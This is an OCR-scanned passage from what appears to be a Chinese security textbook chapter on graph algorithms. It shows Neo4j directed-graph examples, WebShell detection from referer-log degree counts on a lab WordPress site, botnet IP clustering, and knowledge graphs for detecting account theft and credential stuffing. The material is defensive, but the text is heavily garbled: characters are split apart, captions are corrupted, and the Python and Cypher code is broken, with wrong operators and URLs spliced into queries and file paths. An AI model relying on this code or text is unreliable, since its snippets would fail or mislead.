合 搜 索 广 告 介 绍 神秘 的 知识 图 谱 ， 以 及 知识 图 谱 在 风 控 领域 的 应 用 ， 包 括 检 测 账 户 被 盗 、 撞 库 以 及 简单 的 刷 单 ， 还 有 在 威胁 情报 领域 的 应 用 ， 包 括 挖 据 后 门 文件 的 潜在 联系 以 及 域名 的 潜在 联系 等 。 


13.1 图 得 法 概述 


在 现实 世界 中 ， 有 种 关联 关系 难以 用 数据 库 的 表 结 构 来 表示 ， 比 如 微 博 的 粉丝 关系 、 偶 像 剧 中 的 N 角 恋 、 多 个 域名 之 间 的 注册 关系 等 ， 于 是 图 这 种 古老 的 数据 结构 就 派 上 了 用 场 。 一 般 认 为 ， 如 果 给 图 
的 每 条 边 规定 一 个 方向 ， 那 么 得 到 的 图 称 为 有 向 图 ， 其 边 也 称 为 有 向 边 。 在 有 向 图 中 ， 与 一 个 节点 相关 联 的 边 有 出 边 和 入 边 之 分 ， 而 与 一 个 有 向 边关 联 的 两 个 点 也 有 始点 和 终点 之 分 。 相 反 ， 边 没有 方向 的 
图 称 为 无 向 图 。 我 们 拿 一 个 实际 的 例子 来 讲解 下 用 途 最 为 广泛 的 有 向 图 的 一 些 基 础 知识 。 


微 博 中 的 好 友 关 注 关系 就 是 典型 的 有 向 图 (如 图 13-1 所 示 ) ， 因 为 关注 是 有 方向 性 的 ， 比 如 我 关注 了 钟 丽 绳 ， 但 是 钟 丽 绢 不 一 定 关注 了 我 。 假 定 关 注 关系 如 下 描述 : 
CASE TC; 

BA TA; 

“ CX ËD; 


: D 关 注 了 A 和 PB。 





图 13-1 图 算法 原理 图 


D 关 注 了 两 个 人 ， 所 以 他 的 出 度 为 2，D 被 1 个 人 关注 ， 所 以 他 的 入 度 为 1。 


图 的 聚 类 算法 ， 最 简单 的 一 种 实现 叫做 连通 分 支 ， 其 原理 如 图 13-2 所 示 。 所 谓 连 通 分 支 ， 指 的 是 图 中 由 边 连 接 在 一 起 的 一 组 项 点， 不 要 求 顶 点 之 间 必 须 两 两 相连 ， 但 是 连通 分 支 的 任意 两 个 顶点 之 间 ， 
至 少 存在 一 条 路 径 ， 计 算 连 通 分 支 时 不 区 分 有 向 图 和 无 向 图 。 





图 13-2 图 的 连通 分 支 原 理 图 


13.2 示例: hello world! 有 向 图 


Neo4ij 是 一 个 高 性 能 的 图 形 数据 库 ， 它 将 结构 化 数据 存储 在 网 络 上 而 不 是 表 中 ， 因 其 具有 嵌入 式 、 高 性 能 、 轻 量 级 等 优势 ， 越 来 越 受到 人 们 关注 。 我 们 以 Neo 必 为 例 进行 讲解 。 编 写 我 们 的 第 一 个 有 向 图 
程序 ， 完 整 演示 代码 请 见 本 书 GitHub 上 的 13-1.py。 


1.neo4j 安 装 
在 https://neo4j.com/ 上 下 载 安装 包 进 行 安装 ， 默 认 配置 即 可 。 
2.ne04j 局 动 


以 我 的 mac 为 例子 ， 通 过 gui 局 动 ， 启 动 界面 如 图 13-3 所 示 ， 默 认 密 码 为 ne04j/ne04j， 第 一 次 登录 会 要 求 更 改 密码 。 


Neo4; Community Edition 


RNE + 


-Database Location - 


/Users / maidou/Documents /Neo4j/default.graphdb Choose... 


j Status 


Options... 





图 13-3 neo4j È Sl Jt 


启动 管理 界面 见 图 1 3-4。 


|ì localhost:747 4/browser/ 





Database Information 


Node labels 
:play start 


Relationship types a neo 


Learn about 
COMMUNITY 


peri eh edel esca EDITION Neo4j 
A graph epiphany awaits 
you. 


neo4) What is a 
-) server user list 
graph 


database? 


Connected as a4 4 


Database 
How can | 
< e JE 
default.graphdb 
212.25 KiB 
+) sysinfo 


Start Learning 


Join the thousands who have graduated f 





图 13-4 heo4j 管 理 界面 
3.SDK 安 装 


Python API 库 安装 : 





sudo pip install neo4j-driver 





下 载 JPype: 


https://pypi.python.org/pypi/JPypel 





安装 JPype: 


tar -zxvf JPypel-0.6.2.tar.gz 
cd JPypel-0.6.2 
sudo python setup.py install 





4. 导 入 数据 


微 博 关注 关系 如 图 13-5 所 示 。 





Billy 


图 13-5” 微 博 关 注 关系 图 


假设 要 将 上 面 的 微 博 好 友 关 系 导 入 数据 库 。 


导入 库 并 连接 数据 库 : 


from neo4j.vl import GraphDatabase, basic auth 
driver = GraphDatabase.driver ("bolt://localhost", auth-basic auth("neo4j", "maidou")) 
session = driver.session() 





插入 人 物 节点 以 及 关注 关系 数据 : 


insert query = ''' 

UNWIND {pairs} as pair 

MERGE (pl:Person {name:pair[0] } 
MERGE (p2:Person (name:pair[1]]) 
MERGE (pl1)-[:KNOWS]- (p2); 




















data = [ ["Jim", "Mike" ] E ["Jim", "Billy"] A ["Anna", "Jim"] ; 
["Anna", "Mike"] ; ["Sally", "Anna"] 7 ["Joe", "Sally"] ; 
["Joe", "Bob" ] " ["Bob", "Sally"] ] 
session.run(insert query, parameters={"pairs": data]) 














5. 查 询 数 据 





查询 1: 
foaf query = ''' 





MATCH (person:Person)-[:KNOWS]- (friend) -[:KNOWS] - (foaf 
WHERE person.name = {name} 

AND NOT (person)-[:KNOWS]- (foaf) 
RETURN foaf.name AS name 


— 























results = session.run(foaf query, parameters={"name": "Joe"]) 
for record in results: 
print (record ["name"]) 





运行 结果 为 : 


B0000000B60544:code liu.yan$ Python 13-1.py 
Anna 


查询 2: 


common friends query = """ 
MATCH (user:Person)-[:KNOWS]- (friend) -[:KNOWS] - (foaf: Person) 
WHERE user.name = (user) AND foaf.name = {foaf} 
RETURN friend.name AS friend 
Www 










































































results = session.run(common friends query, parameters={"user": "Joe", "foaf": "Sally"]) 
for record in results: 
print (record["friend"]) 























查询 结果 为 : 


B0000000B60544:code liu.yan$ python 13-1.py 
Bob 








查询 3: 





connecting paths query = """ 

MATCH path = shortestPath ((pl:Person) -[:KNOWS*http: //www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16472/OEBPS/Text/..6]- (p2:Person)) 
WHERE pl.name = {namel} AND p2.name = {name2} 

RETURN path 









































results = session.run(connecting paths query, parameters={"namel": "Joe", "name2": "Billy"]) 
for record in results: 
print (record["path"]) 








结果 为 : 





B0000000B60544:code liu.yan$ python 13-1.py 
«Path start-7 end-16 size-4» 











6. 可 视 化 展现 
可 视 化 可 以 分 两 点 : 1) 展示 原始 数据 ，2) 展示 关联 关系 。 


Neo4D 原 始 数据 如 图 13-6 所 示 。 


$ MATCH p=()-[r:KNOWS]->() RETURN p LIMIT 25 








| LC" nane" :" Anna"), {}, {"name": "] | 
| im")] | 
-| 
| [ ("^ name" : "Sally"), O, (" nane" :" | 
| Anna" }] | 
| 
| [(" name" : "Bob" ),(), (" name" :" Sa | 
| Vy"}] 


| [{"name":"Joe"}, {}, {"name":"Sa| 
|y" 

p 
| [{"name":"Joe"},{}, ("name" :"Bo | 


|b"}] | 


| [f"name": "Anna"), ty. ("name" : "M | 
| ike")] | 


| [{"name" : "Jim"},{}, ("name" :"Mi | 


Started streaming 8 records after 39 ms and completed after 62 ms. 


























图 13-6 ”neo4j 原 始 数 据 图 


Neo4j 天 联 天 系 如 图 13-7 所 示 。 


$ MATCH pzs()-[r:KNOWS]-»() RETURN p LIMIT 25 


" 
tico EJ KNOWSI8) 


Displaying 7 nodes, 8 relationships. 


图 13-7 Neo4j 关 联 关系 可 视 化 图 


13.3 示例 : 使 用 有 了 同 图 识别 WebShell 


完整 演示 代码 请 见 本 书 GitHub 上 的 13-2.py 以 及 13-3.py。 
Webshell 具 有 很 多 访问 特征 ， 其 中 和 有 向 图 相关 的 为 : 
:入 度 出 度 均 为 0; 
: 入 度 出 度 均 为 1 且 自 己 指向 自己 。 


完整 处 理 流 程 如 图 13-8 所 示 。 


提取 请 求 


人 
原始 数据 和 re er ZE 导 和 人 图 数据 库 





查询 入 度 出 度 
均 为 0 或 1 





图 13-8 HTTP H & XE 3E Ab A 
1. 数 据 整理 


我 们 在 新 安装 的 WordPress 网 站 下 面 安装 一 个 简单 的 后 门 1.php， 如 图 13-9 所 示 ， 内 容 为 phpinfo。 


€ X |ì 180.76.190.79/wordpress/wp-admin/1.php 


crise pin 2637 126586 ONO SD 
en 202017 160246 


' /configure' '--prefix=/bitnami/lampstack-linux-x64/ou 
groupzdaemon' '-- TEMERE ee -linux- 
Seni nee poke ge --with-zlib-dirz/bitnami/l: 


ROTOR OEE '--with-jpeg-dir=/bitnami/lampstack-L | 
ampstack-linux-x64/output/common' '--wi 
calendar '—-enable-ctype' '--enable-pentl' '--enable- sessioni 


with- en vn xu odo onm. '- 
freetype-dirz/bitnami/lampstack-linux-x64/output/common' 
with-gettext' '--enable-i ' -with-readlinez/bitnami am psta 
linux-x64/output/common/lib" 'CFLAGSz-O2 '-I/bitnami/la 
‘LDFLAGS=-L/bitnami/lampstack-linux-x64/outp OMT 
x64/output/common/include' 





EJ13-9 ”测试 环境 中 放置 的 后 门 文件 


Apache 默 认 不 记录 refer 字 段 ， 需 要 修改 默认 配置 ， 开 启 HTTPD 自 定义 日 志 格 式 ， 记 录 User-Agen 以 及 Referer: 





<IfModule logio module» 

4 You need to enable mod | logio. c to use $I and $0 

LogFormat "$h $1 $u $t \"Sr\" %>s %b \"S{Referer}i\" \"S{User-Agent}i\" $I $0" combinedio 
«/IfModule» 

CustomLog "logs/access log" combined 























针对 1.php 的 访问 日 志 大 


























[rootQinstance-81p4smgv logs]# cat access log | grep 'wp-admin/1.php' 
125.33.206.140 - - [26/Feb/2017:13:09:47 +0800] "GET /wordpress/wp-admin/1.php HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10 12 3) AppleWebKit/537.36 (KHTML, 
125.33.206.140 - - [26/Feb/2017:13:11:19 +0800] "GET /wordpress/wp-admin/1.php HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10 12 3) AppleWebKit/537.36 (KHTML, 
















































































逐 行 处 理 日 志 ， 生 成 原始 页 面 请 求 的 URL 和 该 页 面 refer 指 向 URL 的 对 应 关系 ， 聚 合 结果 举例 为 : 


-> http://180.76.190.79/wordpress/wp-admin/1.php 

-> http://180.76.190.79/wordpress/wp-admin/admin-ajax.php 

-> http://180.76.190.79/wordpress/wp-admin/customize.php 

-> http://180.76.190.79/wordpress/wp-admin/load-styles.php 

-> http://180.76.190.79/wordpress/wp-admin/post-new.php 

-> http://180.76.190.79/wordpress/wp-login.php 

ttp://180.76.190.79/wordpress/ -> http://180.76.190.79/wordpress/wp-admin/edit-comments .php 
ttp://180.76.190.79/wordpress/ -» http://180.76.190.79/wordpress/wp-admin/profile.php 
ttp://180.76.190.79/wordpress/ -» http://180.76.190.79/wordpress/wp-login.php 
ttp://180.76.190.79/wordpress/ -» http://180.76.190.79/wordpress/xmlrpc.php 
ttp://180.76.190.79/wordpress/wp-admin/ -» http://180.76.190.79/wordpress/wp 


















































Sees ih ob ue e 




















2. 数 据 导入 


连接 数据 库 : 





driver = GraphDatabase.driver ("bolt://localhost:7687",auth=basic auth ("neo4j", "maidou")) 
session = driver.session() 


逐 行 读 取 ， 生 成 节点 以 及 关联 关系 : 











for line in file object: 

matchObj = re.match( r'(\St+) -> (\St+)', line, re.M|re.I) 
if matchObj: 
path = matchObj.group (1); 

















ref = matchobj .group (2); 
if path in nodes.keys(): 

path node - nodes[path] 
else: 








ath node = "Page$d" $ index 
nodes [path]-path node 
sql = "create ($s:Page (url: V'$sN" , id:\"%sd\",in:0,out:0})" %(path node, path, index) 
index=index+1 v 
session.run (sql) 








把 入 度 出 度 作 为 节点 的 属性 ， 更 新 节点 的 出 度 入 度 属性 : 











if ref in nodes.keys(): 
ref node = nodes [ref] 





























else: 

ref node = "Page$d" $ index 

nodes [ref]=ref_ node 
sql = "create ($s:Page {url:\"%Ss\",id:\"Sd\",in:0,out:0})" %(ref node, ref, index) 
index=index+] B 











session.run (sql) 
Sql = "create ($s)-[:IN]-»($s)" $(path node,ref node) 
session.run (sql) 2 E 
Sql = "match (n:Page {url:\"%s\"}) SET n.out=n.out+1" % path 





























sql = "match (n:Page {url:\"%s\"}) SET n.in=n.in+1" $ ref 
session.run (sql) 





3. 查 询 结果 


网 页 天 联 关 系 原始 数据 如 图 13-10 所 示 。 


C |ì localhost:7474/browser/ 


Database Information 


Node labels 


MATCH (n:Page) RETURN n LIMIT 25 


Relationship types 


Property keys 


Connected as 


neo4, 


server user list 


Database 


3.1 

default.graphdb 

674.09 KiB 
svsinfo 


图 13-10 ”网 页 关联 关系 原始 数据 


网 页 关联 关系 可 视 化 结果 如 图 13-11 所 示 。 


ma" 

pM 
| £n" in" ' "a" A "40" H wae å "url" - "word $ " | 
|out":"0"} | 
el 
| "in" ° "9" : "4240 ° wa" . "ur" ° "http| 
| ://180.76.190.79/wordpress/wp- | 
|admin/1.php","out":"Q") | 


| (" in":"0","id":"3" ,"url":"http| 
| ://180.76.190.79/wordpress/wp- | 
ladmin/admin-ajax. php" , "out" :"0 | 
|l") | 
pM 
| ("in":"0","1d":"4","url":"http| 
|://180.76.190.79/wordpress/wp- | 
ladmin/customize.php" "out" :"Q" | 
|} | 
[ ——————————— 
| ("in"*:"0" , "1d": "5", Pur": http] 
|://180.76.190.79/wordpress/wp- | 
ladmin/load-styles.php","out":"| 
|o") | 
-一 
| ("in":"0","id":"6", UPV :"http| 
| ://180.76.190.79/wordpress/wp- | 





$ MATCH (n:Page) RETURN n LIMIT 25 




















图 13-11 网 页 关联 关系 可 视 化 图 


查询 入 度 为 1 出 度 均 为 0 的 节点 或 者 查询 入 度 出 度 均 为 1 且 指 向 自己 的 节点 ， 由 于 把 ref 为 空 的 情况 也 识别 为 "- "节点 ， 所 以 入 度 为 1 出 度 均 为 0。 查 询 满足 条 件 的 疑似 Webshell 链 接 ， 如 图 13-12 所 示 。 


$ match (n:Page) where ( n.in=1 and n.out=@ ) or ( n.in=1 and n.out=1 ) return n.url 


$ match (n:Page) where ( n.in=1 and n.out=@ ) or ( n.in=1 and n.out=1 ) return n.url 


http://180.76.190.79/wordpress/wp-admin/1.php 
A http://180.76.190.79/wordpress/wp-admin/profile. php 
Text http://180.76.190.79/wordpress/wp-admin/index.php 


</> 


Code 





图 13-12 ”查询 疑似 WebShell 的 链接 


在 生产 环境 实际 使 用 中 ， 我 们 遇 到 的 误 报 分 为 以 下 几 种 : 
. 主页 ， 各 种 index 页 面 ; 
: Phpmyadmin、Zabbix 等 运 维 管理 后 台 ; 
: Hadoop、ELK 等 开源 软件 的 控制 台 ， 
| APIO., 


EWA ASR, CORRE a RAISIN, Xai Wes CS PA SALN AMARA AH. 


13.4 示例 : 使 用 有 了 同 图 识别 僵尸 网 络 


黑 产 团伙 通过 控制 僵尸 网 络 ， 如 图 13-13 所 示 ， 主 要 达到 以 下 几 个 目的 : 
. 发 送 广 告 邮件 ; 


. 发 起 DDoS 攻击 ; 


* 全 网 扫描 漏洞 并 自动 化 渗透 具有 漏洞 的 主机 ， 不 断 扩 充 肉鸡 的 规模 。 


黑 产 通常 会 对 整个 僵尸 网 络 发 布 相同 的 控制 指令 ， 所 以 通过 统计 一 段 时 间 内 攻击 源 IP 和 被 攻击 者 域名 之 间 的 关联 关系 ， 可 以 初步 确定 哪些 IP 可 能 是 被 同一 个 黑 产 团体 控制 ， 如 图 13-14 所 示 。 





图 13-13 ” 黑 产 控制 僵尸 网 络 发 起 攻击 示意 图 


原始 数据 获得 攻击 源 IP 和 被 生成 IP 攻击 域名 
ii 攻击 域名 对 应 关系 的 hash 列表 





任意 两 个 IP 关联 关系 保留 攻击 域名 数 


4H ^. > ; f 
BARTER OPIS ec unas Are J 大 于 图 值 的 





图 13-14 IP 与 被 攻击 域名 处 理 流程 图 


完整 演示 代码 请 见 本 书 GitHub 上 的 13-4.py。 
1 数据 整理 


获取 开源 攻击 数据 网 站 http://www.secrepo.com/ 上 的 数据 并 整理 成 训练 集合 ， 格 式 如 下 : 


97.74.144.16* *nggui.cn 
97.74.144.16* *lfinancetips.* 
97.74.144.16* *zc.* 
97.74.237.19* *000.* 
98.150.210.24* *qi-steel-shot.* 
98.21.4.24* *dapower.* 




















其 中 IP 地 址 和 域名 做 了 脱 敏 处 理 。 


脱 敏 函 数 实 现 为 : 





with open(filename) as f: 
for line in f: 
line=line.strip('\n') 

ip, domain=line.split () 
ip=re.sub(r'\d$', '*', ip) 

domain= re.sub(r'\w{3}S', '*', domain) 
domain = re.sub(r'*\w{3}', '*', domain) 


Qo 


print "Ss $s" % (ip,domain) 


























2. 数 据 导入 


逐 行 读 取 攻击 数据 ， 按 照 攻击 源 IP 建 立 hash 表 ，hash 表 的 键 值 为 被 攻击 的 域名 : 











with open(filename) as f: 
for line in f: 
(ip,domain)-line.split(" ") 
if not ip=="0.0.0.0": 

if not iplist.has key (ip): 
iplist [ip]={} 
iplist [ip] [domain]=1 
































TEMBER, IAB RITRAIPA WAS ETE: 








for ip in iplist.keys(): 
f len(iplist[ip]) >= R: 
goodiplist [ip]=1 
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#jarccard 系 数 
def get _ len (d1,dqd2): 
dsl=set () 
for d in dl.keys(): 
ds1.add (d) 
ds2=set () 
for d in d2.keys(): 
ds2.add (d) 
return len (dsl&ds2)/len(ds1|ds2) 














满足 阔 值 的 I|P 导 入 图 数据 库 : 








for ipl in iplist.keys(): 

for ip2 in iplist.keys(): 

if not ipl == ip2 : 

weight-get len(iplist[ipl],iplist[ip2]) 
f (weight >= N) 

# 点 不 存在 会 自动 添加 
G.add edge (ipl,ip2,weight-weight) 



































H- 








3. 查 询 分 析 


定 于 阅 值 M， 当 同一 团伙 的 IP 大 于 等 于 M 时 才 显 示 结 果 : 


and (ipl in goodiplist.keys()) and (ip2 in goodiplist.keys()): 





n sub graphs-nx.number connected components (G) 
sub graphs-nx.connected component subgraphs (G) 
for i,sub graph in enumerate (sub graphs): 

n nodes-len (sub graph.nodes () ) 

if n nodes »- M: 











print("Subgraph (0) has (1) nodes {2}".format(i,n nodes,sub graph.nodes())) 





定义 全 局 阅 值 ， 包 括 相似 度 、 黑 客 团伙 IP 最 小 个 数 等 : 























# 相 似 度 

N-0.5 
黑客 团伙 IP 最 少 个 数 
=3 

黑客 IP 攻 击 目标 最 小 个 数 
R=2 

结果 举例 为 : 


Subgraph 2 has 20 nodes ['58.219.226.23*', '58.208.34.6*', 


"08,255. 121.0 *"', 


Subgraph 3 has 3 nodes ['58.49.86.23*', '60.22.103.2*', '59.53.67.20*'] 


Subgraph 5 has 5 nodes ['58.217.185.12*', '59.63.28.17*', 





"OO 4S. PLL, 


"OO eA STL; 


'60.220.65.4*', '61.188.148.12*', 


'59.63.248.4*'] 


'59.56.44.*', 


'58.241.12.14*', 


"58.255.129.22**, 


'60.161.88.13*', 





可 视 化 聚 类 结果 如 图 13-15 所 示 。 











图 13-15 ”僵尸 网 络 聚 类 效果 图 


13.5 ”知识 图 谱 概 述 


当 你 在 百度 搜索 “孙悟空 的 师傅 ”时 (参见 图 13-16) ， 会 直接 展现 出 唐僧 和 车 提 老 祖 的 百度 百科 介绍 。 


ee 
Bai c EIE 孙悟空 的 师傅 9 | 加 EE 


网 页 新闻 贴吧 知道 音乐 BR ”视频 地 图 文库 ES» 


百度 为 您 找到 相关 结果 约 2,920,000 个 了 搜索 工具 





E36 ”在 百度 搜索 “孙悟空 的 师 传 ” 


这 是 因为 百度 搜索 通过 知识 图 谱 建 立 实体 之 间 的 属性 与 关系， 让 搜索 引擎 更 懂 用 户 的 意图 ， 直 接 解答 用 户 的 疑惑 。 


当 你 拿 起 手机 搜索 “全聚德 ”时 ， 会 自动 展现 你 附近 的 全 聚 德 店 的 位 置 ， 如 图 13-17 所 示 。 


ae 
Bai 作 百度 | 全聚德 





A $& zB lE) 
Y 3710 Yee 2844 条 评论 
地 址 : 前 门 大 街 32 号 前 门 步行 街 北口 内 ..…. 
电话 : 010-67011379 ie 
B 全 型 德 奥运 村 店 ) O28 
Y 16230 Ye eco 781 条 评论 
地 址 : 朝阳 区 大 屯 路 慧 忠 北里 309 己 楼 .… 
电话 : (010)64801686 
C2EG een) 928 
Y 13932 we www 511 条 评论 
Mit: JERK PARIS hee... 
电话 : (010)82150018 
查看 全 部 39 条 结果 >> 
map.baidu.com + 





图 13-17 BRR ARE 
这 是 因为 百度 搜索 借助 于 知识 图 谱 ， 结 合用 户 行为 信息 ， 为 用 户 提供 更 符合 当前 场景 的 搜索 结果 。 
当 你 在 百度 搜索 “ 达 芬 奇 ” 时 ， 除 了 会 展现 达 : 芬 奇 相关 的 信息 ， 同 时 也 会 自动 展现 关注 达 : 芬 奇 的 人 同时 也 关注 的 其 他 人 物 以 及 作品 ， 见 图 13-18。 


这 是 因为 百度 搜索 通过 知识 图 谱 建 立 事物 之 间 的 关联 ， 扩 展 用 户 搜索 结果 ， 发 现 更 多 内 容 。 





图 13-18 ”百度 搜索 “ 达 芬 奇 ” 





2012 年 ，Google 在 其 官方 博客 中 宣称 : 为 了 让 用 户 能 够 更 快 、 更 简单 地 发 现 新 的 信息 和 知识 ，Google 搜 索 将 发 布 “知识 图 谱 ” (Knowledge Graph) 可 以 将 搜索 结果 进行 知识 系统 化 ， 任 何 一 
个 关键 词 都 能 获得 完整 的 知识 体系 。 比 如 搜索 “Amazon” (亚马逊 河 ) ， 一 般 的 搜索 结果 会 给 出 和 Amazon 最 相关 的 信息 。 比 如 Amazon 网 站 ， 因 为 网 上 关于 它 的 信息 最 多 ， 但 Amazon 并 不 仅仅 是 一 个 
网 站 ， 它 还 是 全 球 流 量 最 大 的 Amazon 河 流 。 如 果 再 追溯 历史 ， 它 可 能 还 是 希腊 女 战士 一 族 的 代称 。 而 这 些 结果 未 来 都 会 在 Google 搜 索 的 “知识 图 谱 ”中 展现 出 来 。Google 的 “知识 图 谱 ”不 仅仅 会 从 
Freebase、 维 基 百 科 或 全 球 概览 中 获得 专业 的 信息 ， 同 时 还 通过 大 规模 的 信息 搜索 分 析 来 提高 搜索 结果 的 深度 和 广度 。 现 在 Google 数 据 库 中 包含 超过 5 亿 个 事物 ， 不 同事 物 之 间 的 关系 超过 35 亿 条 。 同 时 人 
们 搜索 得 越 多 ，Google 获 得 的 信息 也 就 越 多 越 全 面 ， 整 个 “知识 图 谱 ” 也 就 会 达到 更 好 的 效果 。 


知识 图 谱 本 质 上 可 以 认为 是 图 的 一 种 具体 应 用 ， 它 大 量 集成 了 互联 网 上 的 各 类 数据 ， 从 而 进一步 挖掘 出 了 数据 的 潜在 联系 与 价值 。 在 安全 领域 应 用 知识 图 谱 ， 可 以 挖掘 数据 之 间 潜 在 的 联系 ， 结 合 这 些 
潜在 的 联系 可 以 大 大 扩展 我 们 的 数据 分 析 思 路 。 


13.6 示例 : 知识 图 语 在 风 控 领 城 的 应 用 


传统 的 风 控 策 略 主要 基于 模型 和 策略 ， 这 在 传统 行业 已 然 有 着 很 大 的 市 场 ， 但 是 在 互联 网 环境 下 ， 职 业 黑 产 团伙 以 及 羊毛 党 的 加 入 ， 传 统 的 风 控 策略 已 经 大 打折 扣 。 如 何 利用 互联 网 上 各 类 数据 ， 挖 掘 
蛛丝马迹 ， 进 行 风 控 呢 ? 知 识 图 谱 ， 作 为 关系 的 直接 表示 方式 ， 可 以 很 好 地 和 解决 这 两 个 问题 。 首 先 ， 知 识 图 谱 提供 非常 便捷 的 方式 来 添加 新 的 数据 源 。 其 次 ,知识 图 谱 本 身 就 是 用 来 表示 关系 的 ， 这 种 直观 
的 表示 方法 可 以 帮助 我 们 更 有 效 地 分 析 复 杂 关 系 中 存在 的 特定 的 潜在 风险 。 下 面 我 们 结合 几 个 典型 场景 介绍 知识 图 谱 在 风 控 领域 的 应 用 。 完 整 演 示 代 码 请 见 本 书 Github 上 的 13-5.py。 


13.6.1 -检测 疑似 账号 被 次 


盗号 是 互联 网 业务 中 常见 的 恶意 行为 。 盗 号 的 渠道 也 非常 多 ， 从 暴力 破解 到 撞 库 都 可 能 导致 账户 被 盗 ， 单 纯 依 赖 用 户 名 和 密码 认证 已 经 无 法 保障 账户 的 安全 。 我 们 使 用 脱 敏 的 测试 数据 来 演示 疑似 账户 
被 盗 的 情况 。 测 试 样本 记录 了 微软 的 邮件 系统 的 手机 客户 端 成 功 登 录 日 志 : 











uid=mike, ip=ip1, tel=tell, activesyncid=1 
uidemike,ip-ip2,tel-tell,activesyncid-2 
uidemike,ip-ip3,tel-tell,activesyncid-2 
uid-john,ip-ipl,tel-tel2,activesyncid-2 
uid-john,ip-ip4,tel-tel2,activesyncid-2 
uid-john,ip-ip5,tel-tel2,activesyncid-2 

































































‘uid, APA; 

- ip， 登 录 IP 地 址 ; 

“ tel， 人 安装 微软 邮件 客户 端的 手机 的 手机 号 ; 

.activesyncid， 安 装 微软 邮件 客户 端的 手机 对 应 activesyncid， 该 id 全 局 唯一 ， 与 硬件 绑 定 ， 类 似 微软 在 PC 上 的 guid。 


疑似 账户 被 盗 逻 辑 上 对 应 的 拓扑 结构 如 图 13-19 所 示 。 





activesy 
ncid=2 









mike | John 
activesy 


ncid- 1 








图 13-19 EHE P 3 RE 


从 拓扑 图 可 以 看 出 来 ，activesyncid 为 2 的 硬件 登录 了 mike 和 john 两 个 账户 ，mike 历 史上 曾经 成 功 登录 过 activesyncid 为 1 的 硬件 以 及 activesyncid 为 2 的 硬件 ， 初 步 判 定 activesyncid 为 2 的 硬件 盗 取 了 
mike 的 账户 登录 。 


逐 行 处 理 样本 文件 ， 获 取 对 应 的 uid、ip、tel、activesyncid : 














with open ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/samplel.txt") as f: 
G = nx.Graph() 
for line in f: 
line=line.strip('\n') 

uid, ip, tel, activesyncid=line.split(',') 
































以 uid 为 中 心 ， 添 加 对 应 的 ip、tel、activesyncid 节 点 : 


G.add edge(uid, ip) 
G.add edge(uid, tel) 
G.add edge(uid, activesyncid) 


可 视 化 知识 图 谱 : 





nx.draw(G, with labels-True, node size=600) 
plt.show () 





对 应 知识 图 谱 见 图 13-20。 


tel=tel] 


activesyncid-1 


ip=i1p 










ip=ip | e 


“tel=tel2 
* 


ip=ip2 


uid=mike 


| 9 | uid=john 
activesyncid=2 


ip=1p5 


图 13-20 ”疑似 账户 被 盗 的 知识 图 谱 


13.6.2 ”检测 疑似 撞 库 攻击 


撞 库 是 黑客 通过 收集 互联 网 已 泄露 的 用 户 和 密码 信息 ， 生 成 对 应 的 字典 表 ， 尝 试 批量 登录 其 他 网 站 后 ， 得 到 一 系列 可 以 登录 的 用 户 。 很 多 用 户 在 不 同 网 站 使 用 的 是 相同 的 账号 密码 ， 因 此 黑客 可 以 通过 
获取 用 户 在 A 网 站 的 账户 从 而 尝试 登录 B 网 站 ， 这 就 可 以 理解 为 撞 库 攻击 。2014 年 12 月 25 日 ，12306 网 站 用 户 信息 在 互联 网 上 疯 传 。 对 此 ，12306 官 方 网 站 称 ， 网 上 泄露 的 用 户 信息 系 经 其 他 网 站 或 渠道 流 
出 。 据 悉 ， 此 次 泄露 的 用 户 数据 不 少 于 131653 条 。 该 批 数据 基本 确认 为 黑客 通过 “ 撞 库 攻击 ”所 获得 。 我 们 使 用 脱 敏 的 测试 数据 来 演示 疑似 撞 库 攻击 的 情况 。 测 试 样本 记录 了 微软 的 邮件 系统 的 网 页 版 登录 
日 志 ， 其 中 既 包含 登录 成 功 也 包含 登录 失败 的 情况 : 


uidemike,ip-ipl,login-yes,ua-ual 
uidemike,ip-ipl,login-no,ua-ual 
uid=lily, ip=ipl, login=yes, ua=ual 
uid=willy, ip=ip1, login=no, ua=ual 
uid=tony, ip=ip1, login=yes, ua=ual 
uid-charly,ip-ipl,login-yes,ua-ual 
uid=steven, ip=ip1, login=no, ua=ual 

i 

, 
































uid=mery, ip=ipl, login=no, ua=ual 
uid=john, ip=ip1, login=no, ua=ual 


























‘uid, HP £; 
ip， 登录 了 地 址 ; 
logn, ARRAS, yes HÆK, nn HARK; 


ua， 浏览 器 的 ua 字段 ， 通 常 结合 ip 和 ua 字段 可 以 在 一 定 程度 标识 一 个 用 户 或 者 设备 。 


疑似 撞 库 攻击 逻辑 上 对 应 的 拓扑 结构 如 图 13-21 所 示 。 


tony 





steven 





图 13-21 ZtHMAJEREXdREH 


从 拓扑 图 可 以 看 出 来 ， 大 量 账户 从 ip1 登 录 ， 并 且 ua 字 段 相同 ， 登 录 失 败 和 成 功 的 情况 均 存 在 ， 疑 似 发 生 了 撞 库 攻击 行为 。 通 常情 况 下 ， 同 一 |P 不 会 出 现 大量 登 录 行 为 ， 即 使 办 公 网 出 口 这 种 人 员 密 集 的 
地 方 ， 也 应 该 主要 是 登录 成 功 为 主 ， 不 应 该 登录 成 功 与 失败 数量 均 比 较 大 。 


逐 行 处 理 样 本 文件 ， 获 取 对 应 的 uid、ip、login、ua 字 段 : 














with open ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/sample2.txt") as f: 
G = nx.Graph() 
for line in f: 
line=line.strip('\n') 

uid, ip, login, ua=line.split(',') 





























以 uid 为 中 心 ， 添 加 对 应 的 ip、login、ua 节 点 : 





G.add edge(uid, ip) 
G.add edge(uid, login) 
G.add edge(uid, ua) 





可 视 化 知识 图 谱 : 

















nx.draw(G, with labels-True, node size=600) 
plt.show () 








对 应 知识 图 谱 见 图 13-22。 


uid=john( ) 






login=yes 


uid=ton 
vid=mik ] y 
uid=willy —- 


uid=steven 


图 13-22 ”疑似 撞 库 攻击 的 知识 图 谱 


13.6.3 ”检测 疑似 刷 单 


实体 店 等 各 渠道 的 优惠 促销 活动 、 免 费 业 务 之 类 的 信息 产生 了 浓厚 的 兴趣 。 他 们 有 


